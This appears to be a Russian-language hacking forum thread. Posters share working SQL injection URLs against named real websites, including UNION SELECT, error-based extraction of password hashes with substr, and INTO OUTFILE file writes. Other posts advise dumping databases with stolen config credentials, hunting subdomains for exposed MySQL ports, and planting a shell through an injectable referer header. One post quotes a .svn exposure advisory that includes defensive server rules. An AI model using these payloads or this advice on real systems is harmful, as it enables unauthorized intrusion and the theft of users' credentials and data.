http://www.sin-bad.ru/main.php?f=10+UnIoN+sElEcT+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16--+f В самом низу 4.0.27-log
Это прикол, да? Что за палки перед операторами? С чего ты взял, что там фильтр какой-то? Извините, конечно, но это *facepalm*. http://www.radimpex.rs/download.php?id=1 and(substring(version(),1,1)=3)&lang=en Там просто мускул 3ей ветки =\ http://www.radimpex.rs/download.php?id=1 or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1 -- -&lang=en Duplicate entry '3.23.581' for key 1
возникла проблема с выводом приватной информации с похеканного сайта. некоторую информацию выводит нормально, но как только прописываю таблицы с паролями юзеров, сразу перекидывает на главную страницу сайта (и там пропечатывается мой код запроса в каком-нибудь поле). попытался вставить сайт в прогу Havij. она загрузила таблицы и поля. я взял загрузить то поле, которое было с паролями юзеров. но вылезло "Turning off 'bypass illegal union' and retrying". скажите, в чем проблема? я думаю, что нужны права админа. доступ к админке сайта есть
skagen Кодировка. Попробуй: SELECT unhex(hex(version())) FROM ... Либо другие варианты, описанные в статьях.
такой вопрос, есть логин и пароль от БД, phpmyadmin нету, в строке host стоит знак % тоесть можно подключатся к с любого ипа, но проблема в том что нет открытого 3306 порта. както можно ещо иначе подключится или безнадёжно?
та сканил, всё что есть PHP: Discovered open port 25/tcp Discovered open port 110/tcp Discovered open port 80/tcp Discovered open port 53/tcp Discovered open port 443/tcp
Это не все что есть. Если сайт того стоит - потрать время , потрудись и проскань как можно большее количество портов. Изучи ответ сервера по каждому порту, а не смотри в дамп проги чем ты там сканишь. К тому-же, посмотри в конфигах и реверс IP какие субдомены имеются. Частенько делают базовый домен на который прекрывают порты а к примеру mysql.site.ru открыт для подключения. Опять -же, через реверс IP пробей может зальешься на смежные домены, тогда локально подключишься.
Выкачал папку phpmyadmin с сервера, в ней находятся все базы данных сайтов хостящихся на этом сервере?
http://twocomrades.ru/svn Уязвимость SVN всех версий Нами была найдена уязвимость SVN всех версий, с помощью которой можно получить исходные коды проекта. Уязвимость имеет силу на проектах, исходные коды которого обновляются через SVN и вебсервер не запрещает читать скрытые директории. По умолчанию ни один вебсервер это не делает. Степень угрозы: средняя/высокая Архитектура SVN предусматривает хранение метаданных и версионную информацию файла для каждой директории исходных кодов. Данные находятся в метадиректории «.svn». Получив доступ к ней, можно как минимум построить файловое дерево проекта, узнать URL основного репозитория и список пользователей SVN, как максимум — получить доступ к исходным кодам проекта. Исследование было произведено совместно с Антоном Исайкиным. Способы защиты Закрыв доступ на чтение из скрытых директорий на сервере, вы обезопасите себя от подобных уявимостей. Nginx (лучший вебсервер всех времён и народов, кстати) location ~ \.svn { deny all; } Apache <Directory ~ ".*\.svn"> Order allow,deny Deny from all Satisfy All </Directory> SVN По возможности делать выгрузку исходникиов на продакшен-сервер посредством svn export. Кто знает подробнее?
spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.user http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.user+into+outfile+%27/var/www/properm.ru/htdocs/1.txt%27--+ http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.user+into+outfile+%27tmp/1.txt%27--+ что не так?
Chuvash, ищи логин и пароль к бд в конфигурационных фаилах таких как *config, config.inc.php и т д , цепляйся к бд делай полный дамп.
Базы данных физически располагаются в директории указанной в конфигурации msyql сервера. Различия могут быть в зависимости как от дистрибутива, так и опционально указанные при компиляции либо измененные после установки. Смотри my.cnf
Привет, есть вопрос. Имею скуль типа Code: script.php?id=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+password+FROM+tablename+LIMIT+0,1),floor(rand(0)*2)))+--+ Есть все основания полагать, что соленый хеш может быть больше 64 символов. Вопрос- как получить остальные символы, т.к. выдает только первые 64?
несовсем тебя понял, 1)посмотри их в тругой таблице 2) если как я понял у тебя соль вместе с хешами и стоит ограничение на длину вывода то воспользуйся функцией substr тут типа c 1-50 символов Code: script.php?id=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+substr(password,1,50)+FROM+tablename+LIMIT+0,1),floor(rand(0)*2)))+--+ тут типа c 50-100 символов Code: script.php?id=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+substr(password,50,100)+FROM+tablename+LIMIT+0,1),floor(rand(0)*2)))+--+ сори если опять туплю)
ребят,подскажите,пожалуйста... есть сайт на нем есть файл error.log,в который записываются ошибки БД...на самом сайте вывод ошибок отключен по-видимому...да и найти ошибку,которая фиксировалась бы в файле тоже оказалось сложно...однако,я её нашёл и хотел спросить можно ли с помощью данного файла и правильно составленного запроса залить шелл или вывести хоть какую-ту нужную информацию? часть файла еррор.лог: Code: [15-Apr-2012 18:29:23] Mysql Error: - /var/www/папка сайта/httpdocs/index.php - Querystring: seite=index&id=1%27%221000 - Query: UPDATE sessions SET partner='38', partnerTyp='A', template='01', host='374', kampagne='', keywords='', pageviews='1', ref='1'"3000', design_sitename='In Ist Drin', design_headline='', design_subline='', design_individuell='0' WHERE sid='1db420cb93a608c25c4c2990f164ea55' [15-Apr-2012 19:19:05] Mysql Error: - /var/www/папка сайта/httpdocs/index.php - Querystring: seite=index&id=1%27%221000 - Query: UPDATE sessions SET partner='38', partnerTyp='A', template='01', host='374', kampagne='', keywords='', pageviews='1', ref='1'"0000 union select version() --', design_sitename='In Ist Drin', design_headline='', design_subline='', design_individuell='0' WHERE sid='792bce446a531fd049eaa1b174c5ecba' ошибка возникает в заголовке referer (ref)
Если кавычки не слешируются, то можешь попробывать реализовать полноценную SQL-иньекцию, если файл сможешь прочитать как пхп код, то сможешь реализовать PHP-иньекцию, экспириментируй, все в твоих руках! P.S: если не ошибаюсь то кавычки не слешируются...
